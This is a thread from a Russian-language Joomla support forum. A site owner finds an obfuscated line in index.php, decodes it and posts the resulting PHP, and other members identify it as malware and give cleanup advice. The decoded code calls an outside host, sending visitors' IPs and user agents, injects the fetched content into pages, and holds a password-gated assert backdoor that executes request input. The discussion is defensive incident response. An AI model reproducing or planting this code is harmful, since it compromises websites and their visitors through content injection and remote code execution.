Форум русской поддержки Joomla!® CMS
07.12.2016, 16:29:40 *
Добро пожаловать, Гость. Пожалуйста, войдите или зарегистрируйтесь.
Вам не пришло письмо с кодом активации?

Войти
   
   Начало   Поиск Joomla 3.0 FAQ Joomla 2.5 FAQ Joomla 1.5 FAQ Правила форума Новости Joomla Реклама Войти Регистрация Помощь  
Страниц: [1]   Вниз
  Добавить закладку  |  Печать  
Автор

Странный код в index.php

 (Прочитано 2272 раз)
0 Пользователей и 1 Гость смотрят эту тему.
mnogoto4ka
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 136


« : 14.05.2015, 10:09:55 »

Добрый день. Сегодня обнаружил, что в файле Index.php (Joomla 2.5) прописан код, который я раньше не замечал. $fil = 'ass';$fil .= 'ert';@$fil(str_rot13('riny(onfr64_qrpbqr("nJLtX............ и т.п. Сравнивал аналогичный файл с других сайтов - там такой строки нет. Подскажите, что это? Спасибо.
Записан
kik84
Живу я здесь
******

Репутация: +59/-4
Offline Offline

Сообщений: 1307



« Ответ #1 : 14.05.2015, 10:23:58 »

Похоже на вредоносный.
Записан
mnogoto4ka
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 136


« Ответ #2 : 14.05.2015, 10:44:49 »

Пытаюсь расшифровать. На одном сайте выдало вот что:

Код:
<?php if (isset($ibv)) {
    echo $ibv;
} else {
    if (!empty($_COOKIE["client_check"])) die($_COOKIE["client_check"]);
    if (!isset($c_["HTTP_ACCEPT_CHARSET"])) {
        if (preg_match("!.!u", file_get_contents($_SERVER["SCRIPT_FILENAME"]))) {
            $c0 = "UTF-8";
        } else {
            $c0 = "windows-1251";
        }
    } else {
        $c0 = $c_["HTTP_ACCEPT_CHARSET"];
    }
    if (function_exists("curl_init")) {
        $c1 = curl_init("http://oldcolonybeckley.com/get.php?d=" . urlencode($_SERVER["SERVER_NAME"] . $_SERVER["REQUEST_URI"]). "&u=" . urlencode($_SERVER["HTTP_USER_AGENT"]). "&c=" . $c0 . "&i=1&ip=" . $_SERVER["REMOTE_ADDR"] . "&h=" . md5("a0674ab0b11c3b681a477ad6f5033423" . $_SERVER["SERVER_NAME"] . $_SERVER["REQUEST_URI"] . $_SERVER["HTTP_USER_AGENT"] . $c0 . "1"));
        curl_setopt($c1, 42, false);
        curl_setopt($c1, 19913, true);
        $ibv = curl_exec($c1);
        curl_close($c1);
    } elseif (ini_get("allow_url_fopen") == 1) {
        $ibv = file_get_contents("http://oldcolonybeckley.com/get.php?d=" . urlencode($_SERVER["SERVER_NAME"] . $_SERVER["REQUEST_URI"]). "&u=" . urlencode($_SERVER["HTTP_USER_AGENT"]). "&c=" . $c0 . "&i=1&ip=" . $_SERVER["REMOTE_ADDR"] . "&h=" . md5("a0674ab0b11c3b681a477ad6f5033423" . $_SERVER["SERVER_NAME"] . $_SERVER["REQUEST_URI"] . $_SERVER["HTTP_USER_AGENT"] . $c0 . "1"));
    }
    if (isset($ibv)) {
        echo $ibv;
    }
    if (isset($_REQUEST["p"]) && $_REQUEST["p"] == "c79f0b3a") {
        @assert($_REQUEST["c"]);
    }
}
Записан
mnogoto4ka
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 136


« Ответ #3 : 14.05.2015, 12:08:56 »

Подскажите, пожалуйста, что означает этот код.
Записан
vegushka
Завсегдатай
*****

Репутация: +36/-1
Offline Offline

Пол: Мужской
Сообщений: 542


Мажьте лоб вазеленкой


« Ответ #4 : 14.05.2015, 12:40:27 »

Такой код картинками надо выкладывать. А код скорее всего берет страничку с сайта "o l d c o l o n y b e c k l e y" и вставляет в ваши страницы.
Записан
wishlight
Профи
********

Репутация: +200/-1
Offline Offline

Пол: Мужской
Сообщений: 3487


skype aqaus.com


« Ответ #5 : 14.05.2015, 12:49:58 »

Короче понятно, что сайт взломали.
Записан
mnogoto4ka
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 136


« Ответ #6 : 14.05.2015, 13:05:08 »

Посоветуйте, что сделать в первую очередь.
Записан
mnogoto4ka
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 136


« Ответ #7 : 14.05.2015, 13:06:41 »

Я этот код удалил из файла. Но, я думаю, этого мало. Как то он прописался в файле.
Записан
vegushka
Завсегдатай
*****

Репутация: +36/-1
Offline Offline

Пол: Мужской
Сообщений: 542


Мажьте лоб вазеленкой


« Ответ #8 : 14.05.2015, 13:12:54 »

полное сравнение файлов сайта с дистрибутивом Joomla той же версии. Это как избавиться... дальше уже защита сайта
Записан
wishlight
Профи
********

Репутация: +200/-1
Offline Offline

Пол: Мужской
Сообщений: 3487


skype aqaus.com


« Ответ #9 : 14.05.2015, 13:26:07 »

Посоветуйте, что сделать в первую очередь.

Если сайтов больше одного на хостинге убрать его от других. Проверить антивирусами, сканерами типа ai-bolit. Удалить вредоносный код, закрыть уязвимости, сменить пароли.
Записан
winstrool
Завсегдатай
*****

Репутация: +39/-2
Offline Offline

Пол: Мужской
Сообщений: 725


Свободен для работы


« Ответ #10 : 14.05.2015, 13:58:10 »

Если сайтов больше одного на аккаунте, то имеет смыл лечить все, а то толку в работе не будет, либо разбивать все по аккаунтам и затем лечить!
Записан
mnogoto4ka
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 136


« Ответ #11 : 14.05.2015, 14:28:20 »

Спасибо большое за советы. Начинаю "лечить".
Записан
Страниц: [1]   Вверх
  Добавить закладку  |  Печать  
 
Перейти в:  

Powered by SMF 1.1.21 | SMF © 2006, Simple Machines

Joomlaforum.ru is not affiliated with or endorsed by the Joomla! Project or Open Source Matters.
The Joomla! name and logo is used under a limited license granted by Open Source Matters
the trademark holder in the United States and other countries.

LiveInternet